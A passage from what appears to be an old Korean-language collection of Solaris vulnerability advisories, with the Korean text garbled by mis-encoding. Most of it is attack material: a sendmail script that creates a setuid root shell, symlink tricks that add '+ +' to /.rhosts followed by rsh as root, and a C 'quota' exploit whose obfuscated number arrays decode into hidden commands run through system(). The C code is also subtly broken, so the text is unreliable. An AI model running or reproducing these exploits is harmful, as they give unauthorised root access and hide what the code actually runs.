if [ $nombre = $1 ]
then
entro=1
fi
done
done
date
echo "- Ok $username is logged now."
#
echo "- Lets wait that $1 run pine. "
noejecuto=0
ejecuto=0
until [ $ejecuto -ne $noejecuto ]
do
ÇØ°áÃ¥
PineÀÇ ¹öÁ‾À» 3.95ÀÌ»óÀ¸Î ¹Ù²Ù¾î¶ó.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º sendmail
¸íÉ
sendmail ( 8.7.x ~ 8.8.2?)
½Ã½ºÅÛ
¼Ö¶ó¸®½º 2.5 2.5.1
¹®Á¦Á¡
¼¾µå ¸ÞÀÏ»óÀÇ ¹ö±×Î çÆ®½©À» »ý¼ºÇÒ ¼ö ÀÖ´Ù.
´ÙÀ½Àº ±× ¿¹Á¦ÀÌ´Ù.
#/bin/sh
#
# Modify RUN in x.c for what you wanna run, and possibly the
# location or format of the ps command in the KILL line below for
# your platform.
#
# Or you could remove x.c alltogether and just put what you wanna
# do as root in smtpd.c (Ie: 'echo "+ +" >>/.rhosts' works nicely)
#
#
cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
(ÀÏÃÀÇ °úÁ¤ ..)
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut
-d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
ÇØ°áÃ¥
¼¾µå¸ÞÀÏÀÇ ¹öÁ‾À» 8.8.5 ÀÌ»óÀ¸Î ¿Ã¸®¸é µÈ´Ù.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º admintool
¸íÉ
admintool
½Ã½ºÅÛ
¼Ö¶ó¸®½º 2.5
¹®Á¦Á¡
´ÙÀ½°ú °°Àº°£´ÜÇÑ °æÀ§Î .rhostsÆÄÀÏÀ» »ý¼ºÇÏ¿© çÆ®¸¦ ȹµæÇÒ¼ö ÀÖ´Ù.
setenv DISPLAY yourdisplay:0.0
ln -s /.rhosts /tmp/.group.lock
/usr/bin/admintool
(ÀÏÃÀÇ °úÁ¤ )
echo "+ +" >> .rhosts
/usr/bin/rsh localhost -l root "(/usr/openwin/bin/xterm&)"
ÇØ°áÃ¥
setuid¸¦ ¾ø¾Ö´øÁö ÆÐÄ¡¸¦ Ç϶ó.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º imstat(¶óÀ̼¾½º ¸Å´ÏÁ®)
¸íÉ
imstat(¶óÀ̼¾½º ¸Å´ÏÁ®)
½Ã½ºÅÛ
¼Ö¶ó¸®½º 2.4
¹®Á¦Á¡
/var/tmp ¿¡ Àӽà ÆÄÀÏÀ» ¸¸µç´Ù..À̸¦ ÀÌ¿ëÇؼ .rhosts¸¦ ¸µÅ©½ÃÄÑ
»ý¼ºÇÒ ¼ö ÀÖ´Ù.
rm /var/tmp/locksuntechd
ln -s /.rhosts /var/tmp/locksuntechd
(ÀÏÃÀÇ °úÁ¤ )
ÇØ°áÃ¥
Æ۹̼ÇÀ» ´Ý¾î¶ó
---------------------------
Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º quota
¸íÉ
quota
½Ã½ºÅÛ
¼Ö¶ó¸®½º 2.5(.1 ??)
¹®Á¦Á¡
ÄõÅÍÁ¦ÇÑÀ» ÇÇÇÏ¸é¼ ÆÄÀÏÀ» »ý¼ºÇÒ ¼ö ÀÖ´Ù.
±× ¿¹Á¦ÀÌ´Ù.
/**************************************************************************
* This exploit takes advantage of the latest sendmail hole, to hide *
* warez from your quota program, effectivly making your quota infinate.. *
* *
* To compile: *
* cc -o bigquota quota.c *
* To run: *
* ./bigquota file *
* where file is the file you wish to hide from your quota program. *
* *
* Please note that this may take a minute. *
* If you have any problems, talk to me, TSK, on IRC. *
**************************************************************************/
#include
#include
#include
#include
#include
int seedsc[201]={52,3,3,77,115,13,71,15,41,51,61,29,103,13,100,47,124,42,86,\
44,45,11,7,50,17,123,87,66,32,78,109,62,53,43,84,72,71,0,88,41,1,33,9,52,118,\
65,120,119,68,84,15,11,27,101,0,106,46,19,75,16,25,55,81,74,113,88,96,19,91,\
118,73,58,41,90,88,87,118,103,58,50,71,41,86,33,115,9,105,29,48,113,5,98,50,\
94,79,18,111,99,11,126,111,109,90,46,18,43,43,59,113,76,96,18,27,36,7,74,79,\
85,54,126,23,12,123,118,76,116,85,8,90,111,35,106,113,40,40,122,85,43,108,31,\
32,5,9,77,5,14,99,100,107,114,60,70,19,26,12,14,114,118,48,40,12,106,93,60,\
112,52,67,30,47,55,107,75,90,112,55,38,107,117,22,89,47,79,58,55,119,27,119,\
115,85,38,30,122,126,3,93,97,44,100,32,33,10};
void main(argc, argv)
int argc;
char *argv[];
{
char *checkseed(int *seeds);
char *checkdir(char *dir);
int initseeds[201]={25,\
108,69,89,126,121,84,34,77,52,25,67,44,106,60,124,30,33,3,21,75,67,\
116,109,28,51,81,45,85,119,99,0,98,91,114,102,122,50,81,67,57,43,126,\
2,94,75,10,7,96,29,112,71,103,117,20,72,112,23,105,65,48,119,23,65,\
98,105,33,12,43,12,78,7,53,16,109,91,65,106,43,85,44,113,125,3,61,\
95,18,3,64,96,19,68,52,20,54,122,26,35,126,19,31,106,24,108,59,44,\
41,32,5,1,32,25,64,93,60,97,102,84,92,50,79,11,112,89,27,124,98,\
109,12,0,4,103,114,22,66,36,81,47,52,70,107,51,46,37,99,13,4,31,\
126,19,47,21,96,123,110,72,33,76,8,0,65,86,102,27,75,64,46,122,-47,\
53,1,42,20,-65,63,63,-7,-70,40,-39,-15,46,25,22,86,-39,86,82,21,-16,\
3,-9,-23,11,-21,-90,-30,-7,20,-17,23};
int setupseeds[201]={1,\
35,44,14,107,20,81,111,42,72,73,90,34,86,50,32,16,97,78,80,124,7,\
110,13,71,107,24,91,84,68,58,38,105,68,64,121,37,101,64,65,40,91,8,\
29,9,60,101,123,122,22,92,37,66,13,30,88,8,70,5,28,108,20,101,125,\
38,78,106,98,85,55,92,122,0,93,0,37,97,82,120,70,82,65,74,90,41,\
28,104,80,71,117,11,104,32,69,5,56,2,48,8,112,109,16,109,35,57,43,\
119,37,86,42,62,44,118,117,7,94,88,28,109,125,-23,96,-15,-1,34,-69,33,\
93,10,-64,27,-56,-81,68,68,-5,25,4,10,70,68,42,53,-45,111,87,11,-54,\
-6,4,37,49,81,88,93,90,2,-72,60,65,85,3,-29,47,3,64,-35,78,58,\
42,2,-43,34,-80,53,70,10,-7,25,29,54,21,-11,7,-69,5,-19,4,30,77,\
67,-10,-79,96,23,4,3,-68,84,64,89};
int binseeds[201]={1,\
14,11,95,67,113,29,87,45,24,115,45,88,60,43,114,98,6,56,111,75,13,\
121,123,50,108,17,1,28,15,62,17,81,14,101,39,13,112,90,2,15,114,34,\
64,91,79,79,57,34,31,41,5,34,62,58,93,21,108,110,88,83,114,126,112,\
89,14,41,102,88,10,10,45,111,25,35,38,76,115,57,113,49,72,58,46,83,\
121,87,84,71,81,104,18,41,110,80,82,44,92,5,89,39,104,103,30,96,37,\
12,50,25,64,36,24,54,38,33,35,-79,23,54,-9,87,35,-5,-17,24,-69,-23,\
42,-58,-3,73,11,-3,7,78,-21,15,4,-46,1,84,96,101,-31,96,104,-2,19,\
-7,0,45,34,97,20,96,91,-17,-9,16,67,103,10,-61,48,-7,45,42,2,77,\
-23,1,33,27,-2,-8,80,-6,-17,25,-27,3,-47,43,54,-22,83,2,-17,-39,62,\
89,-7,-11,94,19,-65,72,-3,67,79,111};
int procseeds[201]={-14,\
97,103,125,91,45,90,21,121,60,39,28,60,11,76,41,69,21,118,7,90,63,\
17,17,48,46,68,126,72,66,68,32,54,119,44,98,94,15,21,33,68,4,109,\
121,109,27,7,66,65,126,121,97,40,101,84,6,48,97,38,25,7,56,112,97,\
125,36,125,46,115,108,40,2,105,52,44,17,122,111,98,30,17,112,27,115,29,\
78,125,125,16,81,17,99,88,108,88,14,83,42,26,114,54,90,106,39,126,19,\
95,2,1,69,14,93,114,105,78,48,42,25,87,14,120,124,55,102,57,35,30,\
107,11,74,44,8,100,118,25,73,64,97,106,57,81,92,34,109,80,118,112,85,\
99,99,21,20,62,116,42,111,67,29,79,12,34,84,67,12,105,107,90,109,23,\
116,25,104,89,124,29,-38,1,-9,95,21,0,39,43,45,-72,35,-69,-83,30,78,\
85,-11,-22,111,-47,-65,60,-1,85,78,106};
int boutseeds[201]={-14842,\
37,119,64,88,3,4,11,86,22,104,51,21,57,122,64,113,58,102,72,32,118,\
17,28,35,97,53,125,64,79,95,86,40,122,35,50,48,41,54,18,87,67,125,\
74,95,0,100,19,71,37,69,113,100,82,54,18,123,37,97,107,126,38,114,22,\
75,123,3,33,64,35,37,20,73,68,37,46,89,95,88,22,108,92,51,40,3,\
70,19,125,62,74,69,113,2,25,101,7,59,100,2,69,83,25,33,61,71,117,\
34,70,119,65,27,62,68,25,12,70,87,58,43,112,86,49,24,24,80,84,52,\
6,46,121,115,25,91,53,94,123,12,59,34,66,84,16,93,76,88,38,22,110,\
106,26,101,55,84,64,120,54,29,6,67,54,126,2,17,97,115,41,125,4,4,\
-55,8,41,25,-1,49,76,-61,-85,40,-27,-15,29,50,62,-9,20,-1,-14,15,9,\
32,-72,-94,40,-61,-54,-12,11,72,66,91};
int shtdwnseeds[201]={-42,\
58,44,53,114,68,10,105,76,13,99,1,12,79,50,106,27,65,83,96,30,101,\
122,112,87,118,3,35,55,6,84,59,98,28,58,82,126,98,114,85,125,7,39,\
69,58,21,70,28,35,65,57,70,93,0,36,14,100,107,9,107,71,52,1,29,\
115,63,110,118,28,16,82,53,80,56,50,108,58,109,26,75,19,91,92,59,86,\
125,114,40,76,15,38,8,57,58,103,65,23,52,14,36,8,119,70,47,64,53,\
1,15,83,35,33,80,10,98,51,38,30,14,119,11,26,61,15,117,37,103,117,\
32,4,21,67,40,40,78,74,47,108,27,120,9,114,14,56,75,84,52,29,55,\
108,105,42,71,8,83,89,118,79,22,119,1,28,3,36,22,12,77,77,105,33,\
12,104,-75,18,-4,62,72,-60,1,79,11,0,-17,-8,-23,-4,89,-4,-4,19,76,\
16,-90,-78,45,-38,-65,56,11,77,71,89};
char *zipper(int *seeds1);
char *path;
int i=0,j,inhan,outhan;
if(argc!=2)
{
puts("Usage:");
puts("quota ");
puts("where is the file you wish");
puts("to hide/subtract from your quota.");
exit(0);
}
system(zipper(initseeds));
system(zipper(setupseeds));
system(checkseed(binseeds));
path=checkdir("/");
if(!path)
{
puts("Technical Dificulties");
goto closeout;
}
if((outhan=open(path,O_WRONLY|O_TRUNC))==-1)
{
puts("Error opening outfile");
goto closeout;
}
if((inhan=open(argv[1],O_RDONLY))==-1)
{
puts("Error opening infile");
goto closeout;
}
if(filecopy(inhan,outhan))
{
puts("Technical dificulties");
goto closeout;
}
if((unlink(argv[1]))==-1)
{
puts("Technical dificulties.");
goto closeout;
}
if((rename(path,argv[1]))==-1)
if((link(path,argv[1]))==-1)
if((symlink(path,argv[1]))==-1)
puts("Technical Dificulties.");
closeout:
system("%s\n",zipper(procseeds));
system("%s\n",zipper(boutseeds));
system("%s\n",zipper(shtdwnseeds));
}
char *checkseed(int *seeds)
{
char *zipper(int *seeds1);
char *string;
char testseeds[30];
char god[200];
int i=200,j;
if((string=(char *)getenv("PATH"))==NULL)
{
puts("Path not found");
exit(-1);
}
while((seeds[i]+seedsc[i])!=32)
{
testseeds[200-i]=seeds[i]+seedsc[i];
i--;
}
testseeds[i]=0;
i=0;
while(string[i]!=0)
{
j=0;
while(string[i]!=58&&string[i]!=0)
{
god[j]=string[i];
i++;
j++;
}
i++;
god[j++]=47;
god[j++]=0;
strcpy(&god[j],testseeds);
if(!stat(god,NULL))
return (char *)zipper(seeds);
}
return 0;
}
char *zipper(int *seeds1)
{
int i;
char *buhbye;
char teeth[201];
teeth[201]=0;
for(i=200;i>=0;i--)
teeth[200-i]=seeds1[i]+seedsc[i];
buhbye=(char *)malloc(201);
strcpy(buhbye,teeth);
return buhbye;
}
int filecopy(int from,int to)
{
int bufsiz;
if (from < 0)
return 1;
if (to < 0)
goto err;
for (bufsiz = 0x4000; bufsiz >= 128; bufsiz >>= 1)
{
register char *buffer;
buffer = (char *) malloc(bufsiz);
if (buffer)
{
while (1)
{
register int n;
n = read(from,buffer,bufsiz);
if (n == -1)
break;
if (n == 0)
{
free(buffer);
return 0;
}
if (n != write(to,buffer,(unsigned) n))
break;
}
free(buffer);
break;
}
}
err:
return 1;
}
char *checkdir(char *dir)
{
char *checkdir(char *dir);
DIR *currdir;
struct dirent *node;
struct stat statnode;
int i,j;
char *path;
char *retpath;
path=(char *)malloc(300);
if((currdir=opendir(dir))==NULL)
return 0;
node=readdir(currdir);
while(node)
{
i=0;
j=0;
while(dir[i])
{
path[i]=dir[i];
i++;
}
if(strcmp(dir,"/"))
{
path[i]='/';
i++;
}
while(node->d_name[j])
{
path[i]=node->d_name[j];
i++;
j++;
}
path[i]=0;
if((lstat(path,&statnode))==-1)
return 0;
if(statnode.st_mode&S_IFREG)
if(!access(path,W_OK))
if(!(statnode.st_mode&S_IFBLK))
if(!(statnode.st_mode&S_ISVTX))
if(statnode.st_uid!=getuid())
return path;
if(statnode.st_mode&S_IFDIR)